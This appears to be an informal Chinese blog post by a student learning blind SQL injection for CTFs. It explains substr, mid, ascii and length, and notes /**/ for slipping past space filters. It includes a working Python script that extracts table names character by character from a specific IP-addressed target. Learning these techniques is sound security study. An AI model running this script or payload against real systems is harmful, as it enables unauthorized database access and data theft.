终于上完课了开心,明天就放假
!!!!!!
好的就用中午来谈一下盲注
盲注如大多数注入一样doushiliyong管理员开发是的问题
但盲注大多都不会回显所以大多都是使用脚本跑恩恩
所以我们先要爆表明大多数会用到函数
substr()函数是一个截断函数
string substring(string, start, length)
length是返回字符串的长度
比如:
substr(DATABASE(),2,1)数据库的第二个字符后面可以判断段是否等于
(可以用暴力,用二分法~~~~~~~~)
**函数mid()**也是用来返回字符串的
mid(striing,start,length)
作用和上面那个差不
ascii函数
返回字符串str的最左字符的数值。返回0,如果str为空字符串。返回NULL,如果str为NULL。 ASCII()返回数值是从0到255;
length函数
是用来返回长度可以猜数据库名表明.
import requests
table=''
url="http://119.23.73.3:5004/?id=1'and(ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%s,1))=%s)and'1"
for i in range(1,50):
for j in range(32,126):
payload = url%(str(i),str(j))
s = requests.get(payload)
if 'Hello' in s.text:
table += chr(j)
print table
break
```自己尝试一下
还有可能会过滤字符
所以我们要用其他一些来绕过
空格的绕过是/**/,编码,()等
**以上都是我队友大佬教我的
他是真的强**